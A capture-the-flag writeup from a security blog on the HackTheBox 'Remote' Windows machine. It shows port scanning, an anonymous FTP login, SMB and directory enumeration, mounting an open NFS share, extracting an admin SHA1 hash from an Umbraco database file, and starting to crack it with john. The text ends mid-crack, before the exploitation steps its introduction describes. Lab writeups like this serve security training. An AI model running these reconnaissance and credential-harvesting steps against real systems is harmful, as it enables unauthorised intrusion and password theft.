<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><title>HackTheBox — Remote Writeup | b3t4m3</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox — Remote Writeup" /><meta name="author" content="Carlos Sequeira" /><meta property="og:locale" content="en_US" /><meta name="description" content="Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service UsoSvc to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit." /><meta property="og:description" content="Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service UsoSvc to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit." /><link rel="canonical" href="http://localhost:4000/posts/RemoteHTB/" /><meta property="og:url" content="http://localhost:4000/posts/RemoteHTB/" /><meta property="og:site_name" content="b3t4m3" /><meta property="og:image" content="http://localhost:4000/assets/img/Posts/Remote.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-09-08T14:06:00+05:30" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="http://localhost:4000/assets/img/Posts/Remote.png" /><meta property="twitter:title" content="HackTheBox — Remote Writeup" /><meta name="twitter:site" content="@bet4m3" /><meta name="twitter:creator" content="@Carlos Sequeira" /><meta name="google-site-verification" content="CtBtIysuQ8b6k36FI7jqU-o34DRoA_sye50a-RNtPPY" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Carlos Sequeira"},"@type":"BlogPosting","headline":"HackTheBox — Remote Writeup","dateModified":"2020-09-08T14:06:00+05:30","description":"Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service UsoSvc to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit.","datePublished":"2020-09-08T14:06:00+05:30","url":"http://localhost:4000/posts/RemoteHTB/","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/RemoteHTB/"},"image":"http://localhost:4000/assets/img/Posts/Remote.png","@context":"https://schema.org"}</script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox — Remote Writeup | b3t4m3</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox — Remote Writeup" /><meta name="author" content="Carlos Sequeira" /><meta property="og:locale" content="en_US" /><meta name="description" content="Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service UsoSvc to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit." /><meta property="og:description" content="Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service UsoSvc to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit." /><link rel="canonical" href="http://localhost:4000/posts/RemoteHTB/" /><meta property="og:url" content="http://localhost:4000/posts/RemoteHTB/" /><meta property="og:site_name" content="b3t4m3" /><meta property="og:image" content="http://localhost:4000/assets/img/Posts/Remote.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-09-08T14:06:00+05:30" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="http://localhost:4000/assets/img/Posts/Remote.png" /><meta property="twitter:title" content="HackTheBox — Remote Writeup" /><meta name="twitter:site" content="@bet4m3" /><meta name="twitter:creator" content="@Carlos Sequeira" /><meta name="google-site-verification" content="CtBtIysuQ8b6k36FI7jqU-o34DRoA_sye50a-RNtPPY" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Carlos Sequeira"},"@type":"BlogPosting","headline":"HackTheBox — Remote Writeup","dateModified":"2020-09-08T14:06:00+05:30","description":"Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service UsoSvc to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit.","datePublished":"2020-09-08T14:06:00+05:30","url":"http://localhost:4000/posts/RemoteHTB/","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/RemoteHTB/"},"image":"http://localhost:4000/assets/img/Posts/Remote.png","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/profile.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">b3t4m3</a></div><div class="site-subtitle font-italic">Ethical Hacker | CTF Player | Cybersecurity Specialist</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <span><i class="fas fa-home"></i> HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <span><i class="fas fa-stream"></i> CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <span><i class="fas fa-tags"></i> TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <span><i class="fas fa-archive"></i> ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <span><i class="fas fa-id-card"></i> ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/bet4m3" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/bet4m3" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['b3t4m3','protonmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a> <a href="https://www.hackthebox.eu/profile/163155" target="_blank"> <i class="fas fa-cube"></i> </a> <a href="https://www.linkedin.com/in/b3t4m3/" target="_blank"> <i class="fab fa-linkedin"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>HackTheBox — Remote Writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox — Remote Writeup</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Tue, Sep 8, 2020, 2:06 PM +0530" > Sep 8, 2020 <i class="unloaded">2020-09-08T14:06:00+05:30</i> </span> by <span class="author"> Carlos Sequeira </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Tue, Sep 8, 2020, 3:32 PM +0530" > Sep 8, 2020 <i class="unloaded">2020-09-08T15:32:26+05:30</i> </span></div></div><div class="post-content"> <img src="/assets/img/Posts/Remote.png" class="post-preview-img"><blockquote><p>Remote from HackTheBox is an Windows Machine running a vulnerable version of Umbraco CMS which can be exploited after we find the credentials from an exposed NFS share, After we get a reverse shell on the machine, we will pwn the box using three methods first we will abuse the service <code class="language-plaintext highlighter-rouge">UsoSvc</code> to get a shell as Administrator and later we will extract Administrator credentials from an outdated version of TeamViewer installed on the machine. Lastly, we will also exploit TeamViewer using Metasploit.</p></blockquote><h2 id="tasks">Tasks</h2><ul><li>Mount the NFS share and discover Umbraco credentials inside SDF file</li><li>Crack the password hash using <code class="language-plaintext highlighter-rouge">john</code></li><li>Login to Umbraco application and discover the version</li><li>Exploit Umbraco to get a reverse shell</li><li>Testing Umbraco exploit by <code class="language-plaintext highlighter-rouge">noraj</code></li><li>Run <code class="language-plaintext highlighter-rouge">winPEAS.exe</code> on the machine</li><li>PrivEsc-1 Abuse the <code class="language-plaintext highlighter-rouge">UsoSvc</code> service</li><li>PrivEsc-2 Extract admin credentials from TeamViewer registry and decrypt it</li><li>PrivEsc-3 Autopwn using TeamViewer Metasploit module</li></ul><h2 id="reconnaissance">Reconnaissance</h2><p>Lets start out with <code class="language-plaintext highlighter-rouge">masscan</code> and <code class="language-plaintext highlighter-rouge">Nmap</code> to find out open ports and services:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ masscan <span class="nt">-e</span> tun0 <span class="nt">-p0-65535</span> <span class="nt">--max-rate</span> 500 10.10.10.180

Starting masscan 1.0.5 <span class="o">(</span>http://bit.ly/14GZzcT<span class="o">)</span> at 2020-09-06 11:09:01 GMT
 <span class="nt">--</span> forced options: <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-n</span> <span class="nt">--randomize-hosts</span> <span class="nt">-v</span> <span class="nt">--send-eth</span>
Initiating SYN Stealth Scan
Scanning 1 hosts <span class="o">[</span>65536 ports/host]
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 49678/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 49679/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 49667/tcp on 10.10.10.180
Discovered open port 49666/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 47001/tcp on 10.10.10.180
Discovered open port 49665/tcp on 10.10.10.180
Discovered open port 5985/tcp on 10.10.10.180
Discovered open port 49680/tcp on 10.10.10.180
Discovered open port 49664/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180

cfx:  ~/Documents/htb/remote
→ nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p445</span>,49678,139,49679,21,80,135,49667,49666,111,47001,49665,5985,49680,49664,2049 10.10.10.180
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-09-06 17:49 IST
Nmap scan report <span class="k">for </span>10.10.10.180
Host is up <span class="o">(</span>0.21s latency<span class="o">)</span><span class="nb">.</span>

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span>
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 <span class="o">(</span>RPC <span class="c">#100000)</span>
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 <span class="o">(</span>RPC <span class="c">#100005)</span>
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m09s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   <span class="nb">date</span>: 2020-09-06T12:21:19
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>190.81 seconds
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">nmap</code> &amp; <code class="language-plaintext highlighter-rouge">masscan</code> give us lots of Ports and services such as <code class="language-plaintext highlighter-rouge">HTTP, FTP, SMB, NFS</code> running on the machine, Lets enumerate them accordingly.</p><h3 id="ftp---port-21">FTP - Port 21</h3><p>Anonymous login is allowed but the directory is empty.</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name <span class="o">(</span>10.10.10.180:root<span class="o">)</span>: anonymous
331 Anonymous access allowed, send identity <span class="o">(</span>e-mail name<span class="o">)</span> as password.
Password:
230 User logged <span class="k">in</span><span class="nb">.</span>
Remote system <span class="nb">type </span>is Windows_NT.
ftp&gt; <span class="nb">dir
</span>200 PORT <span class="nb">command </span>successful.
125 Data connection already open<span class="p">;</span> Transfer starting.
226 Transfer complete.
ftp&gt; <span class="nb">exit
</span>221 Goodbye.
</pre></table></code></div></div><h3 id="smb---port-445">SMB - Port 445</h3><p>Using various tools to try enumerating shares:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ smbclient <span class="nt">-N</span> <span class="nt">-L</span> //10.10.10.180
session setup failed: NT_STATUS_ACCESS_DENIED

cfx:  ~/Documents/htb/remote
→ smbmap <span class="nt">-H</span> 10.10.10.180
<span class="o">[!]</span> Authentication error on 10.10.10.180

cfx:  ~/Documents/htb/remote
→ crackmapexec smb <span class="nt">--shares</span> 10.10.10.180
SMB         10.10.10.180    445    REMOTE           <span class="o">[</span><span class="k">*</span><span class="o">]</span> Windows 10.0 Build 17763 <span class="o">(</span>name:REMOTE<span class="o">)</span> <span class="o">(</span>domain:remote<span class="o">)</span> <span class="o">(</span>signing:False<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span>
</pre></table></code></div></div><p>Based on our results we could see Null Sessions are not working to enumerate shares. With <code class="language-plaintext highlighter-rouge">crackmapexec</code> we were able to identify OS and Domain name.</p><h3 id="website---port-80">Website - Port 80</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/Posts/Remote/website.png" alt="website" /></p><p>Lets run <code class="language-plaintext highlighter-rouge">dirsearch</code> to find out hidden directories.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
</pre><td class="rouge-code"><pre><span class="go">cfx:  ~/Documents/htb/remote
→ /opt/dirsearch/dirsearch.py --url http://10.10.10.180 -w /usr/share/wordlists/dirb/common.txt -E

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 10 | Wordlist size: 4614 | Request count: 4614

Error Log: /opt/dirsearch/logs/errors-20-09-06_17-53-02.log

Target: http://10.10.10.180

Output File: /opt/dirsearch/reports/10.10.10.180/20-09-06_17-53-02

[17:53:02] Starting:
[17:53:08] 200 -    7KB - /
[17:53:18] 200 -    5KB - /about-us
[17:53:25] 200 -    5KB - /blog
[17:53:25] 200 -    5KB - /Blog
[17:53:34] 200 -    8KB - /contact
[17:53:34] 200 -    8KB - /Contact
[17:53:56] 200 -    7KB - /home
[17:53:56] 200 -    7KB - /Home
</span><span class="gp">[17:54:00] 302 -  126B  - /install  -&gt;</span><span class="w">  </span>/umbraco/
<span class="go">[17:54:01] 200 -    3KB - /intranet
[17:54:10] 500 -    3KB - /master
[17:54:21] 200 -    7KB - /people
[17:54:21] 200 -    7KB - /People
[17:54:23] 200 -    3KB - /person
[17:54:28] 500 -    3KB - /product
[17:54:28] 200 -    5KB - /products
[17:54:28] 200 -    5KB - /Products
[17:54:55] 200 -    4KB - /umbraco

Task Completed
</span></pre></table></code></div></div><p>Even after browsing various webpages we don’t find anything interesting, However as we scroll down we see various posts and text references near the posts and page source indicating website is running Umbraco CMS.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/Posts/Remote/umbraco.png" alt="umbraco" /></p><p>A little bit of googling reveals Umbraco CMS admin login page is located at <code class="language-plaintext highlighter-rouge">/umbraco</code>. But since we don’t have any credentials we will move on to enumerate <code class="language-plaintext highlighter-rouge">NFS</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/Posts/Remote/login.png" alt="umbracologin" /></p><h3 id="nfs---port-2049">NFS - Port 2049</h3><p>We will use <code class="language-plaintext highlighter-rouge">showmount</code> tool to check which NFS share are accessible to mount and who can mount them.</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ showmount <span class="nt">-e</span> 10.10.10.180
Export list <span class="k">for </span>10.10.10.180:
/site_backups <span class="o">(</span>everyone<span class="o">)</span>
</pre></table></code></div></div><p>Based on the result we discover <code class="language-plaintext highlighter-rouge">site_backups</code> is available to mount and is accessible to everyone, so let’s mount it to our machine and enumerate further.</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ mount <span class="nt">-t</span> nfs 10.10.10.180:site_backups /mnt
</pre></table></code></div></div><p>Analysing the files:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ <span class="nb">ls</span> <span class="nt">-la</span> /mnt
total 123
drwx------  2 nobody 4294967294  4096 Feb 24  2020 <span class="nb">.</span>
drwxr-xr-x 19 root   root        4096 Jul 18 20:37 ..
drwx------  2 nobody 4294967294    64 Feb 20  2020 App_Browsers
drwx------  2 nobody 4294967294  4096 Feb 20  2020 App_Data
drwx------  2 nobody 4294967294  4096 Feb 20  2020 App_Plugins
drwx------  2 nobody 4294967294    64 Feb 20  2020 aspnet_client
drwx------  2 nobody 4294967294 49152 Feb 20  2020 bin
drwx------  2 nobody 4294967294  8192 Feb 20  2020 Config
drwx------  2 nobody 4294967294    64 Feb 20  2020 css
<span class="nt">-rwx------</span>  1 nobody 4294967294   152 Nov  1  2018 default.aspx
<span class="nt">-rwx------</span>  1 nobody 4294967294    89 Nov  1  2018 Global.asax
drwx------  2 nobody 4294967294  4096 Feb 20  2020 Media
drwx------  2 nobody 4294967294    64 Feb 20  2020 scripts
drwx------  2 nobody 4294967294  8192 Feb 20  2020 Umbraco
drwx------  2 nobody 4294967294  4096 Feb 20  2020 Umbraco_Client
drwx------  2 nobody 4294967294  4096 Feb 20  2020 Views
<span class="nt">-rwx------</span>  1 nobody 4294967294 28539 Feb 20  2020 Web.config
</pre></table></code></div></div><p>After looking at various files we come across a file named <code class="language-plaintext highlighter-rouge">Umbraco.sdf</code> inside the <code class="language-plaintext highlighter-rouge">/App_Data</code> folder and find Admin credentials at the top of the file.</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ strings Umbraco.sdf | <span class="nb">head
</span>Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa<span class="o">{</span><span class="s2">"hashAlgorithm"</span>:<span class="s2">"SHA1"</span><span class="o">}</span>en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa<span class="o">{</span><span class="s2">"hashAlgorithm"</span>:<span class="s2">"SHA1"</span><span class="o">}</span>admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa<span class="o">{</span><span class="s2">"hashAlgorithm"</span>:<span class="s2">"SHA1"</span><span class="o">}</span>admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}</code> based on this line, we understand email-id of admin is <code class="language-plaintext highlighter-rouge">admin@htb.local</code> and password SHA1 hash is <code class="language-plaintext highlighter-rouge">b8be16afba8c314ad33d812f22a04991b90e2aaa</code></p><h3 id="cracking-hash-with-john">Cracking hash with John:</h3><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>cfx:  ~/Documents/htb/remote
→ <span class="nb">cat </span>adminhash
b8be16afba8c314ad33d812f22a04991b90e2aaa

cfx:  ~/Documents/htb/remote
→ john adminhash <span class="nt">-w</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
